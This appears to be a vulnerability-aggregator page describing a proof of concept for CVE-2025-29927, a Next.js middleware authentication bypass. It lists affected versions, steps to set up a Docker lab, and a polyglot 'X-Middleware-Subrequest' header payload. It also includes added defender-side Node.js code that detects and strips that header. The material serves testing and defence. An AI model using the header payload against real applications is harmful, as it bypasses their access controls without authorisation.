Associated vulnerability
Description
PoC for CVE-2025-29927: Next.js Middleware Bypass Vulnerability. Demonstrates how the `x-middleware-subrequest` header can bypass authentication checks. Includes a Docker setup for testing.
Introduction
# CVE-2025-29927: Next.js Middleware Bypass Vulnerability PoC
This repository demonstrates the CVE-2025-29927 vulnerability in Next.js, where the internal header `x-middleware-subrequest` can be used to bypass middleware checks like authentication.
## Affected Versions
- Next.js 15.x < 15.2.3
- Next.js 14.x < 14.2.25
- Next.js 13.x < 13.5.9
## Steps to Reproduce
### 1. Clone the Repository:
```bash
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
```
### 2. Navigate to the Project Folder:
```bash
cd CVE-2025-29927-PoC
```
### 3. Generate a Secret:
```bash
openssl rand -base64 32
```
### 4. Update the Secret in the `.env` File:
```
NEXTAUTH_SECRET=your_generated_secret
```
### 5. Build and Run with Docker:
```bash
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
```
## Proof of Concept
We can greatly simplify the exploitation of this issue by using a polyglot that lets us effectively cover the various potential cases. We were able to achieve this with the following HTTP header, used to check for the presence of an authentication bypass:
```
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
```
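The header above works because Next.js treats `x-middleware-subrequest` as an internal marker and skips the middleware when it sees it, so the defensive point is that this header must never arrive from outside. The following is an added example, not code from this repository: a small Node.js edge-side filter that flags inbound requests carrying the header (detection) and strips it before the request is forwarded to the application (the interim mitigation named in the Next.js advisory). The request objects, the `app.example` host and the `inspectRequest`/`stripInternalHeaders` function names are constructed for the example; the colon-separated value format is the one shown in the PoC header.

```javascript
// Added defender-side example (not part of the PoC repository): detect and
// strip the internal `x-middleware-subrequest` header on inbound requests at
// a proxy/edge layer, so that external requests carrying it never reach the
// Next.js application. Plain Node.js, no dependencies.

const INTERNAL_HEADER = 'x-middleware-subrequest';

// HTTP header names are case-insensitive, so compare on lowercased keys.
function normaliseHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    out[name.toLowerCase()] = value;
  }
  return out;
}

// Detection: return a finding when an inbound request carries the internal header.
// `middlewareNames` lists the identifiers the app's own middleware would use; the
// header value is split on ':' (the separator used in the PoC header above).
function inspectRequest(req, middlewareNames = ['middleware', 'src/middleware']) {
  const h = normaliseHeaders(req.headers);
  if (!(INTERNAL_HEADER in h)) return null;
  const segments = String(h[INTERNAL_HEADER]).split(':');
  const knownHits = segments.filter((s) => middlewareNames.includes(s)).length;
  return {
    path: req.path,
    value: h[INTERNAL_HEADER],
    segments: segments.length,
    knownMiddlewareSegments: knownHits,
    // Any external occurrence is suspicious; a value repeating the app's own
    // middleware identifier is the bypass pattern and is rated higher.
    severity: knownHits > 0 ? 'high' : 'medium',
  };
}

// Mitigation: drop the header (whatever its casing) before forwarding upstream.
function stripInternalHeaders(headers) {
  const cleaned = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== INTERNAL_HEADER) cleaned[name] = value;
  }
  return cleaned;
}

// Run a batch of requests through detection and keep only the findings.
function scanRequests(requests) {
  return requests.map((r) => inspectRequest(r)).filter((f) => f !== null);
}

// Constructed sample traffic: one clean request, three carrying the header.
const sampleRequests = [
  { path: '/dashboard', headers: { Host: 'app.example', Cookie: 'session=abc' } },
  { path: '/dashboard', headers: { Host: 'app.example',
      'X-Middleware-Subrequest': 'middleware:middleware:middleware:middleware:middleware' } },
  { path: '/api/auth/session', headers: { Host: 'app.example',
      'x-middleware-subrequest': 'src/middleware:nowaf:src/middleware' } },
  { path: '/', headers: { Host: 'app.example', 'X-Middleware-Subrequest': 'somethingelse' } },
];

for (const finding of scanRequests(sampleRequests)) {
  console.log(JSON.stringify(finding));
}
```

In a real deployment the same two functions sit in whatever fronts the application (a reverse proxy rule or an edge function): log the finding from `inspectRequest` for alerting, then forward only the output of `stripInternalHeaders`. Stripping is a stopgap; upgrading to a patched Next.js release (15.2.3, 14.2.25 or 13.5.9 as listed above) removes the underlying issue.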
## Credits/Sources
- [Next.js Blog on CVE-2025-29927](https://nextjs.org/blog/cve-2025-29927)
- [Zhero Web Security Research: Next.js and the Corrupt Middleware](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware)
- [Assetnote Security Research: Analyzing the Next.js Middleware Bypass](https://slcyber.io/assetnote-security-research-center/doing-the-due-diligence-analysing-the-next-js-middleware-bypass-cve-2025-29927/)
File snapshot
```
[4.0K] /data/pocs/5d5f706c100ca6cde8582ed03a7f15d78aca7826
├── [ 67K] 1.png
├── [149K] 2.png
├── [ 419] Dockerfile
├── [ 963] middleware.js
├── [ 350] package.json
├── [4.0K] pages
│   ├── [4.0K] api
│   │   └── [4.0K] auth
│   │       └── [1.7K] [...nextauth].js
│   ├── [ 283] _app.js
│   ├── [4.0K] auth
│   │   └── [3.2K] signin.js
│   ├── [1013] dashboard.js
│   └── [ 664] index.js
├── [1.8K] README.md
└── [4.0K] styles
    └── [ 225] globals.css

5 directories, 12 files
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has been taken down or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.